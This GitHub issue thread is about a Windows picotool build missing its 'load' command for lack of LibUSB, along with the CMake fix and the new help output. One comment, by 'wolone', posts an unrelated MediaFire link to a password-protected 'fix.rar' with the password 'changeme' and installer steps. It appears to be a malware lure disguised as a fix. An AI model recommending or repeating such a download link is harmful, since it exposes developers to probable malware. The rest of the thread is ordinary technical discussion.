earlephilhower/pico-quick-toolchain #55: Compile picotool with "load" capability

maxgerhardt, 2024-08-26:
The latest release, e.g.  https://github.com/earlephilhower/pico-quick-toolchain/releases/download/2.2.0/i686-w64-mingw32.picotool-8a9af99.240818.zip, seems to be missing some commands. It has

```
SYNOPSIS:
    picotool info [-b] [-p] [-d] [--debug] [-l] [-a] <filename> [-t <type>]
    picotool config [-s <key> <value>] [-g <group>] <filename> [-t <type>]
    picotool encrypt [--quiet] [--verbose] [--hash] [--sign] <infile> [-t <type>] [-o <offset>] <outfile> [-t <type>] <aes_key> [-t <type>] [<signing_key>] [-t <type>]
    picotool seal [--quiet] [--verbose] [--hash] [--sign] [--clear] <infile> [-t <type>] [-o <offset>] <outfile> [-t <type>] [<key>] [-t <type>] [<otp>] [-t <type>] [--major <major>] [--minor <minor>]
                [--rollback <rollback> [<rows>..]]
    picotool link [--quiet] [--verbose] <outfile> [-t <type>] <infile1> [-t <type>] <infile2> [-t <type>] [<infile3>] [-t <type>] [-p] <pad>
    picotool otp list
    picotool partition create
    picotool uf2 convert
    picotool version [-s] [<version>]
    picotool coprodis [--quiet] [--verbose] <infile> [-t <type>] <outfile> [-t <type>]
    picotool help [<cmd>]
```
While https://github.com/raspberrypi/picotool shows more should be available. Specifically, the code for the "picotool load" commands checks for `#if HAS_LIBUSB`, so I guess that's just missing in the build environment?

https://github.com/raspberrypi/picotool/blob/8a9af99ab10b20b1c6afb30cd9384e562a6647f9/main.cpp#L1279-L1301

I think it's crucial for RP2040 and RP2350 that this tool has the load capability, the latest Arduino-Pico upload might also be broken with "picotool" as uploader?

wolone, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

maxgerhardt, 2024-08-26:
Woops, https://github.com/earlephilhower/pico-quick-toolchain/pull/52 already fixes this? Then the release files are just not up-to-date right?

earlephilhower, 2024-08-26:
Ah, the joys of bitrot and people randomly updating things.  :sob:   OpenOCD, which was the tool I was most worried about, actually did take the appropriate LibUSB libs but it looks like Picotool did not when I review the GH action logs.

Let me see about beating that tool back into submission, too.  (Linux is definitely good and it looks like Mac, too...just MINGW64 is wonky).

earlephilhower, 2024-08-26:
The following bit in the Picotool CMAKE isn't working as I expected because it's a -D vs. an environment, I think...
````
....
# Set LIBUSB_ROOT if specified
if (LIBUSB_ROOT)
    set(ENV{LIBUSB_ROOT} ${LIBUSB_ROOT})
endif()
````

maxgerhardt, 2024-08-26:
Right, when I read https://stackoverflow.com/questions/12896988/passing-an-argument-to-cmake-via-command-prompt it seems like the `LIBUSB_ROOT` variable can be influenced with `-DLIBUSB_ROOT="some path"` when `cmake` is invoked in the commandline.

earlephilhower, 2024-08-26:
Will be in the next release, later this week, once more bug reports come in.  Latest action exe output:

````
earle@amd:/tmp/picotool$ wine ./picotool.exe 
PICOTOOL:
    Tool for interacting with RP2040/RP2350 device(s) in BOOTSEL mode, or with
    an RP2040/RP2350 binary

SYNOPSIS:
    picotool info [-b] [-p] [-d] [--debug] [-l] [-a] [device-selection]
    picotool info [-b] [-p] [-d] [--debug] [-l] [-a] <filename> [-t <type>]
    picotool config [-s <key> <value>] [-g <group>] [device-selection]
    picotool config [-s <key> <value>] [-g <group>] <filename> [-t <type>]
    picotool load [--ignore-partitions] [--family <family_id>] [-p <partition>]
                [-n] [-N] [-u] [-v] [-x] <filename> [-t <type>] [-o <offset>]
                [device-selection]
    picotool encrypt [--quiet] [--verbose] [--hash] [--sign] <infile> [-t
                <type>] [-o <offset>] <outfile> [-t <type>] <aes_key> [-t
                <type>] [<signing_key>] [-t <type>]
    picotool seal [--quiet] [--verbose] [--hash] [--sign] [--clear] <infile> [-t
                <type>] [-o <offset>] <outfile> [-t <type>] [<key>] [-t <type>]
                [<otp>] [-t <type>] [--major <major>] [--minor <minor>]
                [--rollback <rollback> [<rows>..]]
    picotool link [--quiet] [--verbose] <outfile> [-t <type>] <infile1> [-t
                <type>] <infile2> [-t <type>] [<infile3>] [-t <type>] [-p] <pad>
    picotool save [-p] [device-selection]
    picotool save -a [device-selection]
    picotool save -r <from> <to> [device-selection]
    picotool verify [device-selection]
    picotool reboot [-a] [-u] [-g <partition>] [-c <cpu>] [device-selection]
    picotool otp list|get|set|load|dump|permissions|white-label
    picotool partition info|create
    picotool uf2 info|convert
    picotool version [-s] [<version>]
    picotool coprodis [--quiet] [--verbose] <infile> [-t <type>] <outfile> [-t
                <type>]
    picotool help [<cmd>]

COMMANDS:
    info        Display information from the target device(s) or file.
                Without any arguments, this will display basic information for
                all connected RP2040 devices in BOOTSEL mode
    config      Display or change program configuration settings from the target
                device(s) or file.
    load        Load the program / memory range stored in a file onto the
                device.
    encrypt     Encrypt the program.
    seal        Add final metadata to a binary, optionally including a hash
                and/or signature.
    link        Link multiple binaries into one block loop.
    save        Save the program / memory stored in flash on the device to a
                file.
    verify      Check that the device contents match those in the file.
    reboot      Reboot the device
    otp         Commands related to the RP2350 OTP (One-Time-Programmable)
                Memory
    partition   Commands related to RP2350 Partition Tables
    uf2         Commands related to UF2 creation and status
    version     Display picotool version
    coprodis    Post-process coprocessor instructions in disassembly files.
    help        Show general help or help for a specific command

Use "picotool help <cmd>" for more info
````

closed 2024-08-26 by earlephilhower

maxgerhardt, 2024-08-27:
Great! Would it also be possible to add a `package.json` into the created pictool package, similiar to the OpenOCD one? Then we can use it directly in the platform.

earlephilhower, 2024-08-27:
Done